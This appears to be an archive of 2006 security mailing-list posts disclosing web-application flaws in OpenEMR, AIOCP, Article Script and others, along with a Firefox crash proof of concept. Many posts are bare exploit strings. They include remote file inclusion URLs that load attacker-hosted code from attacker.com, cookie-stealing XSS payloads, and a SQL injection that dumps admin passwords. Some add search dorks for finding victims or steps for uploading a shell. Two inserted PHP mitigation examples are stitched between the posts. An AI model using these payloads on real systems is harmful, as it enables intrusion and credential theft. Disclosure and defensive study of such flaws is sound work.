http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Arab4Services Team  www.arab4services.com :)


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jan Heisterkamp

[EMAIL PROTECTED] wrote:

New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('');
}



Good bye Firefox!



  

Hi!
That also works under Firefox v1.5.0.7.
regards
jan


AIOCP <=1.3.007 multiple vulnerabilities [sql , remote file include , xss]

2006-11-06 Thread saps . audit
AIOCP <=1.3.007 multiple vulnerabilities [sql injection , remote file include , xss]

XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid='">alert(document.cookie)
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie)
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid='">alert(document.cookie)
- /public/code/cp_dpage.php?choosed_language='">alert(document.cookie)
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie)
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid='">alert(document.cookie)
- /public/code/cp_show_ec_products.php?order_field='">alert(document.cookie)
- /public/code/cp_users_online.php?order_field='">alert(document.cookie)
- /public/code/cp_links_search.php?orderdir='">alert(document.cookie)

xss post in user profile :
- signature
- fiscal code

remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include ) 

sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]


full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=

global risk = high

laurent gaffié & benjamin mossé
http://s-a-p.ca/
[EMAIL PROTECTED]


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jerome Athias

3APA3A wrote:

Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.

  

Hi,

you should be interested in this
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

+ a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA



Mail Drives Security Considerations

2006-11-06 Thread darkz . gsa
Mail Drives Security Considerations
===

Author: Attila Gerendi (Darkz)
Date: November 03, 2006 


 There are several "mail drive" solutions available, like "GMail Drive", "GSpace",
"Gmail FS", etc. These systems are built to store ordinary files in email
accounts (usually Gmail, because it's free 2Gb++ space).

 In some of these solutions the files and folders are usually stored as
attachments in a special email. The file system does not have a FAT (File
Allocation Table), and the information regarding the name and path of the
files/folders is stored in the email SUBJECT field. Additionally there is no
mechanism to filter these emails.

 So the problem is that a remote attacker can blindly send emails which describe
a file or folder in these file systems and manipulate or inject files into that
file system. This may be used for a new spam type or to inject
undesirable/malicious files into someone's file collection. At first sight
this cannot be worse than plain email spamming; however, because this concept
is extending the use of email, if no sanitisation is included then it will
extend the use of spam as well, and some malicious people will find new malicious
solutions for particular or generic situations.

A few examples are described below, other may exist.

1. viksoe's GMail Drive shell extension
---

- file injection. You can inject files into the "GMail Drive file
system" by sending an email with Subject: "GMAILFS: /new_filename.txt [13;a;1]"
and "new_filename.txt" as attachment. However, if the sender is not "self" then
the filename will be displayed in red. The sender email address can be
spoofed.

- folder creation. You can create a new folder by sending an email with
Subject: "GMAILFS: /new_folder/. [14;a;1]"

- rewrite file contents. You can overwrite a file's displayed content by
sending an email with Subject: "GMAILFS: /existing_path/existing_filename.txt
[13;a;1]" and "filename.txt" as attachment. However, if the sender is not "self"
then the extension will display 2 files with the same name, but both will have
the same new content.



2. Gmail File Space(GSpace) by Rahul Jonna 
--

- file injection. You can inject files into the "GSpace file system" by
sending an email with Subject: "GSPACE|new_filename.txt|2174|1|1|1|gs:/ d$" and
putting "new_filename.txt" and "metadata.txt" as attachments. However, the
interface will fill the "from" information with the sender email address. The
sender email address can be spoofed.

- folder creation. You can create a new folder by sending an email with
Subject: "GSPACE|test/|-135|1|1|0|gs:/ d$" and "blank.txt" and "metadata.txt"
as attachments. However, the interface will fill the "from" information with the
sender email address. The sender email address can be spoofed.


Solution:
-
  There are several possible solutions to filter unwanted content, such as
inserting unpredictable IDs in the emails or message signing, but none (in my
opinion) which can offer backward compatibility.
 
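The message-signing mitigation proposed above, as an added PHP example that is not part of the post or of any of the mail drive products it names: a reader-side filter that accepts a GMAILFS subject only if it carries a valid HMAC tag. The " #sig=<hex>" suffix, the shared secret and the rejection of ".." path segments are assumptions of this example; as the post notes, unsigned legacy entries are rejected too, so there is no backward compatibility.

```php
<?php
// Added example, not code from the post or from GMail Drive/GSpace.  The
// drive client appends an HMAC tag to the Subject it writes; the reader
// ignores every file/folder mail whose tag is absent or wrong, so a spoofed
// sender address alone no longer injects files or folders.
// Subject grammar follows the post ("GMAILFS: /new_filename.txt [13;a;1]");
// the " #sig=<hex>" suffix and the secret are assumptions of this example.

const DRIVE_SECRET = 'constructed-example-secret';   // assumed per-client secret

// Tag a subject line before the client sends the file/folder mail.
function signDriveSubject(string $subject, string $secret = DRIVE_SECRET): string
{
    return $subject . ' #sig=' . hash_hmac('sha256', $subject, $secret);
}

// Parse and verify an incoming subject.  Returns the entry on success and
// null for anything unsigned, malformed, forged, or using "..".
function acceptDriveSubject(string $subject, string $secret = DRIVE_SECRET): ?array
{
    // Grammar: "GMAILFS: <path> [<n>;<c>;<n>]" followed by the tag.  The
    // meaning of the bracketed fields is not spelled out by the post, so
    // they are passed through untouched.
    $re = '/^(GMAILFS: (\S+) \[(\d+);(\w);(\d+)\]) #sig=([0-9a-f]{64})$/';
    if (!preg_match($re, $subject, $m)) {
        return null;                                  // unsigned or malformed
    }
    [, $payload, $path, $f1, $f2, $f3, $tag] = $m;

    // Recompute the tag over the payload and compare in constant time.
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $tag)) {
        return null;                                  // forged or tampered
    }

    // Even authentic messages must not name paths outside the drive root.
    if ($path[0] !== '/' || preg_match('#(^|/)\.\.(/|$)#', $path)) {
        return null;
    }
    return [
        'path'   => $path,
        'meta'   => "$f1;$f2;$f3",
        'folder' => substr($path, -2) === '/.',      // "/name/." marks a folder
    ];
}

// Demonstration on constructed subjects: a signed entry, the unsigned
// subject the post's attacker would send, and one signed with the wrong key.
$legit  = signDriveSubject('GMAILFS: /new_filename.txt [13;a;1]');
$spoof  = 'GMAILFS: /new_filename.txt [13;a;1]';
$forged = signDriveSubject('GMAILFS: /new_folder/. [14;a;1]', 'wrong-secret');
foreach ([$legit, $spoof, $forged] as $s) {
    printf("%s\n  => %s\n", $s, acceptDriveSubject($s) ? 'accepted' : 'rejected');
}
```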



[ECHO_ADV_60_2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_60$2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November 1st, 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv60-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : OpenEMR
version : <=2.8.1
URL : http://www.oemr.org

OpenEMR is Open Source electronic medical record and medical practice
management software. OpenEMR is best described as a "system" of programs.
The main OpenEMR program consists of the electronic health records and
scheduling software. OpenEMR can also be configured for insurance billing
with FreeB, accounting with SQL-Ledger, and access controls with php-GACL.
---

Vulnerability:
~~

I found vulnerability in interface/billing/billing_process.php
---interface/billing/billing_process.php-



Proof Of Concept:
~~~

http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?



Solution:
~~~

- Sanitize the variable $srcdir in the affected files.
- Turn off register_globals

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


[ECHO_ADV_59_2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_59$2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November 1st, 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv59-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Agora
version : 1.4 RC1
URL : http://www.agora.gouv.fr

Based on the free software Spip, Agora is free content management software
for the Internet, developed in PHP, which makes it possible to set up and
manage Internet, intranet or extranet sites quickly and at lower cost.
---

Vulnerability:
~~

I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
--modules/Mysqlfinder/MysqlfinderAdmin.php--

http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?


Solution:
~~~

- Insert a new line of code:
  ...
  include_once 'MysqlfinderParam.inc';
  ...

  before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")

- Turn off register_globals
- Turn off display_errors to hide full-path errors

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


Re: @cid stats v2.3 File Include

2006-11-06 Thread Heiko Wundram
On Sunday, 5 November 2006 23:33, mahmood ali wrote:
> 

Completely bogus.

If you look closely, the corresponding code in install.php3 is used to create 
a config file which contains a statement setting $repertoire (from a user 
input, so here is your injection attack for an install script, which is 
pretty much what you want, I'd guess). Anyway, if you don't delete 
install.php3 after the installation is complete, it's your own fault.

-- 
--- Heiko Wundram.

x|encon Support der
Gehrkens.IT GmbH

FON 0511-59027955 | http://www.gehrkens.it
FAX 0511-59027956 | http://www.xencon.net

Gehrkens.IT GmbH
Mailänder Strasse 2
30539 Hannover




[ECHO_ADV_58_2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_58$2006]Cyberfolio <=2.0 RC1 $av  Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November 1st, 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv58-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Cyberfolio
version : <=2.0 RC1
URL : http://www.cyberfolio.org

---

Vulnerability:
~~

I found vulnerability in script view.php
--view.php---

http://target.com/cyberfolio/portfolio/msg/view.php?av=http://attacker.com/inject.txt?
http://target.com/cyberfolio/portfolio/admin/incl_voir_compet.php?av=http://attacker.com/inject.txt?


Solution:
~~~

- Sanitize the variable $av in the affected files.
- Turn off register_globals

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


[ECHO_ADV_57_2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : October 31st, 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv57-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Soholaunch Pro Edition
version : <=4.9 r46
URL : http://www.soholaunch.com

Soholaunch Pro Edition is a software product that makes it easy for people of
all experience levels to create and maintain a great website. It reins in the
hard parts of building a website and presents them in a way that the
non-geek can understand and control.
---

Vulnerability:
~~

I found vulnerability in script shared_functions.php
--shared_functions.php---

http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?
http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?


Solution:
~~~

- Sanitize the variable $_SESSION['docroot_path'] in the affected files.
- Turn off register_globals

Timeline :
~

31 - 10 - 2006 bugs found
31 - 10 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--
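The include pattern shared by the MWChat, OpenEMR, Agora, Cyberfolio and Soholaunch advisories above, and what "sanitize the variable / turn off register_globals" amounts to in code, as an added PHP example that is not code from any of those projects. File and variable names come from the posts; the allowlist and the `library/` directory layout are assumptions.

```php
<?php
// Added example, not code from OpenEMR, MWChat, Agora, Cyberfolio or
// Soholaunch.  It contrasts the include pattern those advisories describe
// with a hardened form.  The allowlist and directory layout are assumed.

// VULNERABLE shape (as the advisories describe it; do not use).  $srcdir is
// never assigned by the script, so with register_globals=On the request
// parameter ?srcdir=http://... supplies it, and allow_url_fopen turns the
// require into a remote file inclusion.
function vulnerableInclude(): void
{
    global $srcdir;
    require_once($srcdir . '/translation.inc.php');
}

// HARDENED.  The base directory is fixed in code, the request may only pick
// a name from an allowlist, and realpath() must keep the result under that
// directory.  register_globals=Off and allow_url_include=Off remain as
// defence in depth, but the check does not rely on them.
define('LIB_DIR', __DIR__ . '/library');                       // assumed layout
const ALLOWED_LIBS = ['translation.inc.php', 'security.php'];  // assumed allowlist

// Returns the absolute path to include, or null if the request is refused.
function resolveLibrary(string $requested, string $baseDir = LIB_DIR,
                        array $allowed = ALLOWED_LIBS): ?string
{
    // Exact, type-strict match: "http://...", "../x" and "security.php/.."
    // all fail here without any further parsing.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested);
    // realpath() returns false for a missing file and resolves symlinks, so
    // the candidate must still start with the real base directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage: the request chooses a name, the resolver decides whether to load it.
$lib = resolveLibrary((string)($_GET['lib'] ?? ''));
if ($lib === null) {
    http_response_code(400);
    exit('refused');
}
require_once $lib;
```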


PHP Rapid Kill All Version File Injection

2006-11-06 Thread null_hack
Discovered By:Null
PHP Rapid Kill All Version File Injection
You can upload your shell code to Rapidshare.de and then copy the link into
the "Link to Download" text box of the web app;
then your shell is uploaded to this URL:
www.site.com/rapidpath/yourfile.php
Download App:http://www.filefactory.com/file/f14862/
Email:null_hack(at)yahoo(dot)com
Greetz to
Gamma Security Team
www.gammahack.com
www.nullak.com


Stanford university SCARF user editing

2006-11-06 Thread navairum
vendor:Someone at Stanford university
site:http://sourceforge.net/projects/scarf/

vuln:
There is no admin check on the file generaloptions.php So anyone can go in and 
make some changes.  One thing to do would be create a user, then go into 
general options and change your user to an admin.  You can also change the 
background, title, and css page through this file.
-navairum


Article Script v1.*and v1.6.3 Sql injection

2006-11-06 Thread liz0
Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Home Page:www.articlescript.org

Bug Founder :Liz0ziM

Mail:[EMAIL PROTECTED]

Who is the boss? Liz0ziM, of course



:D

 

http://www.victim.com/articles/rss.php?category= ' SQL Injection

 

Example:

 
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

 

 

 

<title>admin4521</title> --> Admin name: admin4521

<link>http://www.victim.com/articles/cs1120/page_1/</link> --> Admin password: cs1120

 

 

Dork:


"Powered by Article Script"


":: Article Script - New User Article ::"

 

intitle:":: Article Script -"

 

"Last Articles::"

 

 

Greetz to all my friends

 

Source: http://www.blogcu.com/Liz0ziM/1312100/


@cid stats v2.3 File Include

2006-11-06 Thread mahmood ali

###
@cid stats v2.3  File Include
###
Source Code:

http://www.comscripts.com/jump.php?action=script&id=1115
###
Vulnerable Code:_

install.php3
###
In Line 41 :_

require("'.$repertoire."/".'stats_fonctions.php3
###
Exploit :_

http://www.VicTim.com/[EMAIL PROTECTED]/install.php3?repertoire=ShElL.txt?
###

Discovered By :  Mahmood_ali
###

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM & 
WwW.Tryag.CoM


###
